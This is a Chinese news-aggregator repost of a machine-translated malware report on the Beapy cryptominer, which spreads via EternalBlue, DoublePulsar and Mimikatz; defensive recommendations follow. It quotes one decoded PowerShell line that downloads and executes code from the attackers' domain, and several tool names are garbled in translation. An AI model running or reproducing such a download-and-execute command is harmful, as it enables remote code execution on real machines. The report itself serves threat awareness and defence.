当前位置:首页 > 娱乐

bea 新恶意软件利用NSA黑客工具在企业网络中传播

还记得著名的黑客组织影子经纪人吗,他们什么也没做,只是做了一些惊人的事情?由于影子经纪人在2016年窃取并宣传了美国国家安全局(NSA)用于渗透全球设备和网络的一系列恶意程序,这些恶意程序必须定期出来刷存在感。

一个

背景

赛门铁克发现了一种新的加密挖掘恶意软件,主要针对企业。这种被称为Beapy的恶意软件,利用NSA黑客工具ExeCutive Blue(ExeCutive Blue)和窃取的硬编码凭据在网络中快速传播,从而从受感染的计算机中收集凭据,迫使计算机运行挖掘代码来挖掘加密的数字现金——包括修复的计算机,主要影响中国企业。

Beapy活动最早发现于2019年1月,从3月初开始越来越活跃,也出现在网络服务器上。

Beapy(W32。Beapy)是一个基于文件的coinminer,它使用电子邮件作为初始感染媒介。此次活动表明,虽然加密货币挖掘活动自2018年初以来有所下降,但仍是部分网络犯罪分子关注的焦点,企业现已成为主要攻击目标。

Beapy的受害者几乎都是企业。虽然研究人员没有证据表明这些攻击是有针对性的,但Beapy的蠕虫功能表明它可能在整个企业网络中传播。

Beapy对亚洲企业影响最大,80%以上的受害者位于中国,其他受害者位于韩国、日本、菲律宾、越南、孟加拉国,部分美国企业(美国、牙买加)也受到影响。

2

感染链

Beapy使用恶意电子邮件作为初始载体,其中包含恶意Excel文档的附件。如果电子邮件收件人打开恶意附件,目标计算机将下载后门。NSA开发的双脉冲星。安装后门后,可以在受感染的计算机上远程执行代码。永恒蓝利用视窗中小企业协议中的漏洞,允许文件在网络上水平传播。

安装DoublePulsar后执行PowerShell命令,并在将coinminer下载到目标计算机之前联系Beapy命令和控制(c&c)服务器。

根据研究人员捕获的样本,活动早在2019年2月15日就开始了,当时第一次探测到了双脉冲星的后门。然后,研究人员发现了正在执行的PowerShell命令,其解码如下:iex (new-objectnet.webclient)。downloadstring(' http://v . beahh . com/v "+$ env:user domain)。执行了一些PowerShell命令后,会下载挖掘模块,以“无文件”的方式挖掘门罗币。

Beapy先攻击未打补丁的电脑,然后用永恒蓝(ForeverBlue)感染其他机器。但Beapy不仅使用NSA黑客工具进行传播,还使用Hacktool。Mimikatz是一种窃取凭据的工具,它试图从受感染的计算机上收集凭据,并使用硬编码的用户名和密码列表来试图在网络上传播。

网络服务器

赛门铁克遥测公司还在一个开放的网络服务器上发现了老版本的Beapy。该蠕虫试图通过生成IP地址列表来感染连接到服务器的计算机。

Web服务器上找到的Beapy版本比较老,是用c语言写的,而新版本的Beapy是用Python写的。但是,功能是相似的。下载的恶意软件还包括Mimikatz模块的凭据收集和永恒蓝色利用功能。

在被感染的Web服务器中,Beapy还试图利用Apache Struts漏洞(CVE-2017-5638),该漏洞已于2017年修复,但一旦成功利用该漏洞,就可以执行远程代码。Beapy还试图利用Apache Tomcat(CVE-2017-12615)和Oracle WebLogic服务器(CVE-2017-10271)中的已知漏洞。

总的来说,从3月初开始,Beapy活动一直在增加。

永恒蓝色和双脉冲星

永恒蓝和双脉冲星是影子经纪人发布的NSA黑客工具,在2017年毁灭性的WannaCry ransomware攻击中使用。

永恒蓝专门远程攻击Windows文件共享端口(端口445),让犯罪分子无需任何用户操作,就能在计算机和服务器上植入ransomware、远程控制木马、虚拟货币采掘机等恶意程序。

在此活动中,攻击者更新了永恒蓝色下载器特洛伊木马,并在更新后启用了新的C2域名。永恒蓝下载器木马不断更新,最新更新时间表如下:

在NSA的一系列SMB利用背后,最终会使用DoublePulsar后门。DoublePulsar后门是一个无文件内核级的SMB后门。一旦在后门植入安全系统,就可以长时间远程控制,系统就不再安全。

受DoublePulsar的启发,美国网络安全公司RiskSence的研究员肖恩·狄龙(Sean Dillon)创建了一个名为“SMBdoor”的恶意软件后门,突出了防病毒产品没有注意到的操作系统部分。一旦安装了SMBdoor后门,它将滥用srvnet.sys进程中未记录的API,并将自己注册为服务器消息块(SMB)连接的有效处理程序。这个后门非常隐蔽,因为它没有绑定任何本地套接字、开放端口或钩子到现有的功能,从而避免触发一些防病毒系统警报。

但是SMBdoor代码主要用于学术研究,网络罪犯不能像部署DoublePulsar一样从GitHub下载并感染用户。

对企业的影响

虽然加密货币挖掘恶意软件的破坏性不如ransomware,但它可能仍然会对公司的运营产生重大影响。对企业的潜在影响包括:

设备性能下降,导致生产力下降;设备不稳定或无法使用,导致IT成本增加;企业成本增加,原因有二:用电量增加;有些企业使用的云服务按CPU使用率收费。

因此,企业需要确保其网络免受各种网络安全威胁。

建议

1.检查不正确的Powershell进程、异常的网络访问和异常的CPU占用率,使用杀毒软件及时对系统进行全面扫描。

2.安装永恒蓝漏洞补丁,手动下载,请访问以下页面:https://TechNet . Microsoft . com/zh-cn/library/security/ms17-010 . aspx,其中WinXP和Windows Server 2003的用户应访问:

https://www.catalog.update.microsoft.com/Search.aspx? q = KB 4012598 .

3.尝试关闭不必要的端口,如445、135、139等。端口3389、5900等。可以被列入白名单,并且只允许白名单中的IP连接登录。

4.对没有互联要求的服务器/工作站的内部访问设置相应的控制,防止可以连接到外部网络的服务器被攻击成为进一步攻击其他服务器的跳板。

5.定期对重要文件和数据(如数据库)进行非本地备份。

6.服务器使用高强度密码,不使用弱密码,防止黑客暴力破解。

7.在终端/服务器上部署专业的杀毒软件,防止病毒木马入侵。Web服务器可以部署在腾讯云等具有专业安全防护能力的云服务中。

1.《bea 新恶意软件利用NSA黑客工具在企业网络中传播》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。

2.《bea 新恶意软件利用NSA黑客工具在企业网络中传播》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。

3.文章转载时请保留本站内容来源地址,https://www.lu-xu.com/yule/1070127.html

上一篇

吸血鬼试验引争议 人类意图“重返青春”!

下一篇

奔腾岁月刘立夏结局

美首次承认对俄网络机构进行攻击 事件的真相是什么?

美首次承认对俄网络机构进行攻击 事件的真相是什么?

央视网消息:据多家俄罗斯媒体报道,近日,美国总统特朗普在接受媒体采访时证实,他于2018年批准了对俄罗斯互联网研究所的网络攻击。特朗普称,他在获悉“俄罗斯干预美国选举的情报”后下令对这家互联网研究机构进行了网络攻击。他承认...

休闲跳棋 支持即将到期:微软欲终结Windows 7等系统上自带的网络游戏服务

休闲跳棋 支持即将到期:微软欲终结Windows 7等系统上自带的网络游戏服务

据外媒报道,从2020年1月起,微软将放弃在过时操作系统上支持网游,如Windows 7/XP/ME设备上的互联网跳棋、黑桃等。软件巨头一周前在论坛帖子中写道,Windows XP和me上的微软互联网游戏服务将于2019年7月31日到期。至于Windows 7操作系统,将于2020年1月22...

我的世界pc版 怎么搭建一个我的世界电脑版服务器?

  • 我的世界pc版 怎么搭建一个我的世界电脑版服务器?
  • 我的世界pc版 怎么搭建一个我的世界电脑版服务器?
  • 我的世界pc版 怎么搭建一个我的世界电脑版服务器?
法国南特15世纪教堂发生火灾 登上网络热搜了!

法国南特15世纪教堂发生火灾 登上网络热搜了!

法国南特15世纪教堂发生火灾  当地时间18日早,法国西部城市南特的圣彼得和圣保罗大教堂发生火灾,该教堂始建于15世纪。目前已有60名消防队员被派往灭火。法新社称,这座哥特式建筑的上一次火灾发生在1972年,此后屋顶修复花...

"我可能是假的"成新年首个网络流行语为什么会火呢?

网络映射 1月23日,我可能收到了假年终奖”“可能复习了假书”“可能喝了假酒”“可能交了假男朋友”...你最近在朋友圈和微博上见过这样的话或表情包吗?新年伊始,“我可能是个假的”成为第一流行语,并有疯狂延伸之势,进入各个行...

papi酱回应网络争议 具体是什么情况?

papi酱回应网络争议 具体是什么情况?

papi酱  新浪娱乐讯 9月8日,papi酱发视频回应5月份生子后孩子随父姓引发的一系列热议,她否认网暴他人,否认自我炒作,还表示自己从未更改过自己的置顶内容。对于事情过去这么久,为何现在才澄清。papi酱表示当时刚生完...

阿娇头部表面一层已缝66针 登上网络热搜了!

  • 阿娇头部表面一层已缝66针 登上网络热搜了!
  • 阿娇头部表面一层已缝66针 登上网络热搜了!
  • 阿娇头部表面一层已缝66针 登上网络热搜了!

意大利警方截获咖啡豆藏毒包裹 登上网络热搜了!

意大利警方近期在米兰马尔彭萨机场截获一批咖啡豆,其中大约500颗内藏白色可卡因粉末。英国广播公司20日报道,米兰马尔彭萨机场警方上周在一件2千克重的咖啡豆包裹中发现了150克可卡因粉末。它们被藏在大约500颗剖开的咖啡豆中...